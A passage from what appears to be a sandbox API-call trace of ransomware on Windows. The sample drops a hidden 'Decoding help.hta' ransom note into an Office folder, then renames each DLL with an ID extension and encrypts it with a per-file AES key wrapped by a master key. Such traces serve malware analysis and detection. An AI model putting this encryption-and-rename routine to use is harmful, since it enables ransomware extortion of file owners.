lpThreadId=0x0) returned 0x6a8 [0042.882] CloseHandle (hObject=0x6a8) returned 1 [0042.882] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x169dfd30 | out: lpFindFileData=0x169dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0xa8f17049, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x243448f1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0", cAlternateFileName="")) returned 0 [0042.882] FindClose (in: hFindFile=0x5db338 | out: hFindFile=0x5db338) returned 1 Thread: id = 338 os_tid = 0x2c8 [0042.880] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*", lpFindFileData=0xdd0fd30 | out: lpFindFileData=0xdd0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef0a44f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xba634e00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xba634e00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6719f0 [0042.908] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.908] FindNextFileW (in: hFindFile=0x6719f0, lpFindFileData=0xdd0fd30 | out: lpFindFileData=0xdd0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef0a44f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xba634e00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xba634e00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.908] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.908] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.908] FindNextFileW (in: hFindFile=0x6719f0, lpFindFileData=0xdd0fd30 | out: lpFindFileData=0xdd0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdd9f300, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0x19ac4550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbdd9f300, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0x2778, dwReserved0=0x0, dwReserved1=0x0, cFileName="BHOINTL.DLL", cAlternateFileName="")) returned 1 [0042.908] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*" [0042.908] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*") returned 61 [0042.908] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\Decoding help.hta" [0042.908] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\decoding help.hta")) returned 0xffffffff [0042.909] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6a8 [0042.922] WriteFile (in: hFile=0x6a8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xdd0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xdd0fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.923] CloseHandle (hObject=0x6a8) returned 1 [0042.923] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.923] lstrcmpiW (lpString1="Decoding help.hta", lpString2="BHOINTL.DLL") returned 1 [0042.923] lstrlenW (lpString="BHOINTL.DLL") returned 11 [0042.923] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*" [0042.923] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*") returned 61 [0042.923] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\", lpString2="BHOINTL.DLL" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL" [0042.923] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL" [0042.924] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0042.924] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\bhointl.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\bhointl.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.941] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\bhointl.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x700 [0042.941] CreateFileMappingA (hFile=0x700, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x69c [0042.941] CryptAcquireContextA (in: phProv=0xdd0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xdd0fcec*=0x3448be8) returned 1 [0042.942] CryptGenKey (in: hProv=0x3448be8, Algid=0x6610, dwFlags=0x1, phKey=0xdd0fce8 | out: phKey=0xdd0fce8*=0x671970) returned 1 [0042.942] CryptExportKey (in: hKey=0x671970, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xdd0fbe4, pdwDataLen=0xdd0fce4 | out: pbData=0xdd0fbe4*, pdwDataLen=0xdd0fce4*=0x2c) returned 1 [0042.942] MapViewOfFile (hFileMappingObject=0x69c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2760) returned 0x8b90000 [0042.976] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xdd0fbe4*, pdwDataLen=0xdd0fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xdd0fbe4*, pdwDataLen=0xdd0fcf8*=0x100) returned 1 [0042.977] CryptEncrypt (in: hKey=0x671970, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8b90000*, pdwDataLen=0xdd0fce4*=0x2760, dwBufLen=0x2760 | out: pbData=0x8b90000*, pdwDataLen=0xdd0fce4*=0x2760) returned 1 [0042.977] UnmapViewOfFile (lpBaseAddress=0x8b90000) returned 1 [0042.979] CloseHandle (hObject=0x69c) returned 1 [0042.979] CryptDestroyKey (hKey=0x671970) returned 1 [0042.979] CryptReleaseContext (hProv=0x3448be8, dwFlags=0x0) returned 1 [0042.979] SetFilePointerEx (in: hFile=0x700, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.979] WriteFile (in: hFile=0x700, lpBuffer=0xdd0fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xdd0fcf8, lpOverlapped=0x0 | out: lpBuffer=0xdd0fbe4*, lpNumberOfBytesWritten=0xdd0fcf8*=0x100, lpOverlapped=0x0) returned 1 [0042.980] WriteFile (in: hFile=0x700, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xdd0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xdd0fcf8*=0x500, lpOverlapped=0x0) returned 1 [0042.980] CloseHandle (hObject=0x700) returned 1 [0042.981] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0042.981] FindNextFileW (in: hFindFile=0x6719f0, lpFindFileData=0xdd0fd30 | out: lpFindFileData=0xdd0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25477100, ftCreationTime.dwHighDateTime=0x1cab7d0, ftLastAccessTime.dwLowDateTime=0x507ae0c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x25477100, ftLastWriteTime.dwHighDateTime=0x1cab7d0, nFileSizeHigh=0x0, nFileSizeLow=0x2988, dwReserved0=0x0, dwReserved1=0x0, cFileName="DL_RES.DLL", cAlternateFileName="")) returned 1 [0042.981] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*" [0042.981] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*") returned 61 [0042.982] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\Decoding help.hta" [0042.982] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\decoding help.hta")) returned 0x1 [0042.982] lstrcmpiW (lpString1="Decoding help.hta", lpString2="DL_RES.DLL") returned -1 [0042.982] lstrlenW (lpString="DL_RES.DLL") returned 10 [0042.982] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*" [0042.982] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*") returned 61 [0042.982] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\", lpString2="DL_RES.DLL" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\DL_RES.DLL" [0042.982] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\DL_RES.DLL" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\DL_RES.DLL" [0042.982] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\DL_RES.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\DL_RES.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\DL_RES.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0042.982] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\DL_RES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\dl_res.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\DL_RES.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\dl_res.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.990] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\DL_RES.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\dl_res.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x700 [0042.990] CreateFileMappingA (hFile=0x700, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x69c [0042.990] CryptAcquireContextA (in: phProv=0xdd0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xdd0fcec*=0x3448be8) returned 1 [0042.991] CryptGenKey (in: hProv=0x3448be8, Algid=0x6610, dwFlags=0x1, phKey=0xdd0fce8 | out: phKey=0xdd0fce8*=0x6718b0) returned 1 [0042.991] CryptExportKey (in: hKey=0x6718b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xdd0fbe4, pdwDataLen=0xdd0fce4 | out: pbData=0xdd0fbe4*, pdwDataLen=0xdd0fce4*=0x2c) returned 1 [0042.991] MapViewOfFile (hFileMappingObject=0x69c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2980) returned 0x8b90000 [0043.010] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xdd0fbe4*, pdwDataLen=0xdd0fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xdd0fbe4*, pdwDataLen=0xdd0fcf8*=0x100) returned 1 [0043.010] CryptEncrypt (in: hKey=0x6718b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8b90000*, pdwDataLen=0xdd0fce4*=0x2980, dwBufLen=0x2980 | out: pbData=0x8b90000*, pdwDataLen=0xdd0fce4*=0x2980) returned 1 [0043.011] UnmapViewOfFile (lpBaseAddress=0x8b90000) returned 1 [0043.012] CloseHandle (hObject=0x69c) returned 1 [0043.012] CryptDestroyKey (hKey=0x6718b0) returned 1 [0043.012] CryptReleaseContext (hProv=0x3448be8, dwFlags=0x0) returned 1 [0043.012] SetFilePointerEx (in: hFile=0x700, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.012] WriteFile (in: hFile=0x700, lpBuffer=0xdd0fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xdd0fcf8, lpOverlapped=0x0 | out: lpBuffer=0xdd0fbe4*, lpNumberOfBytesWritten=0xdd0fcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.013] WriteFile (in: hFile=0x700, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xdd0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xdd0fcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.013] CloseHandle (hObject=0x700) returned 1 [0043.014] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\DL_RES.DLL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.014] FindNextFileW (in: hFindFile=0x6719f0, lpFindFileData=0xdd0fd30 | out: lpFindFileData=0xdd0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeb59f00, ftCreationTime.dwHighDateTime=0x1cb7019, ftLastAccessTime.dwLowDateTime=0xba6a7220, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xfeb59f00, ftLastWriteTime.dwHighDateTime=0x1cb7019, nFileSizeHigh=0x0, nFileSizeLow=0x864b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="GrooveIntlResource.dll", cAlternateFileName="GROOVE~1.DLL")) returned 1 [0043.014] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*" [0043.014] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*") returned 61 [0043.014] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\Decoding help.hta" [0043.015] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\decoding help.hta")) returned 0x1 [0043.015] lstrcmpiW (lpString1="Decoding help.hta", lpString2="GrooveIntlResource.dll") returned -1 [0043.015] lstrlenW (lpString="GrooveIntlResource.dll") returned 22 [0043.015] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*" [0043.015] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*") returned 61 [0043.015] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\", lpString2="GrooveIntlResource.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll" [0043.015] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll" [0043.015] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0043.015] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\grooveintlresource.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\grooveintlresource.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.035] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\grooveintlresource.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b0 [0043.035] CreateFileMappingA (hFile=0x6b0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x568 [0043.035] CryptAcquireContextA (in: phProv=0xdd0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xdd0fcec*=0x3448940) returned 1 [0043.036] CryptGenKey (in: hProv=0x3448940, Algid=0x6610, dwFlags=0x1, phKey=0xdd0fce8 | out: phKey=0xdd0fce8*=0x671870) returned 1 [0043.036] CryptExportKey (in: hKey=0x671870, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xdd0fbe4, pdwDataLen=0xdd0fce4 | out: pbData=0xdd0fbe4*, pdwDataLen=0xdd0fce4*=0x2c) returned 1 [0043.036] MapViewOfFile (hFileMappingObject=0x568, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0xe890000 [0043.045] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xdd0fbe4*, pdwDataLen=0xdd0fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xdd0fbe4*, pdwDataLen=0xdd0fcf8*=0x100) returned 1 [0043.045] CryptEncrypt (in: hKey=0x671870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xe890000, pdwDataLen=0xdd0fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0xe890000*, pdwDataLen=0xdd0fce4*=0x100000) returned 1 [0045.078] UnmapViewOfFile (lpBaseAddress=0xe890000) returned 1 [0045.609] CloseHandle (hObject=0x568) returned 1 [0045.609] CryptDestroyKey (hKey=0x671870) returned 1 [0045.609] CryptReleaseContext (hProv=0x3448940, dwFlags=0x0) returned 1 [0045.610] SetFilePointerEx (in: hFile=0x6b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0045.610] WriteFile (in: hFile=0x6b0, lpBuffer=0xdd0fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xdd0fcf8, lpOverlapped=0x0 | out: lpBuffer=0xdd0fbe4*, lpNumberOfBytesWritten=0xdd0fcf8*=0x100, lpOverlapped=0x0) returned 1 [0049.453] WriteFile (in: hFile=0x6b0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xdd0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xdd0fcf8*=0x500, lpOverlapped=0x0) returned 1 [0049.454] CloseHandle (hObject=0x6b0) returned 1 [0053.843] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0056.440] FindNextFileW (in: hFindFile=0x6719f0, lpFindFileData=0xdd0fd30 | out: lpFindFileData=0xdd0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff6a5200, ftCreationTime.dwHighDateTime=0x1cac9b2, ftLastAccessTime.dwLowDateTime=0x19b36970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xff6a5200, ftLastWriteTime.dwHighDateTime=0x1cac9b2, nFileSizeHigh=0x0, nFileSizeLow=0x907d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MAPISHELLR.DLL", cAlternateFileName="MAPISH~1.DLL")) returned 1 [0056.734] lstrcpyW (in: lpString1=0x10c86800, lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*" [0056.734] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*") returned 61 [0056.734] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\Decoding help.hta" [0056.734] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\decoding help.hta")) returned 0x1 [0056.734] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MAPISHELLR.DLL") returned -1 [0056.735] lstrlenW (lpString="MAPISHELLR.DLL") returned 14 [0056.735] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*" [0056.735] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*") returned 61 [0056.735] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\", lpString2="MAPISHELLR.DLL" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL" [0056.735] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL" [0056.735] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0056.735] MoveFileW 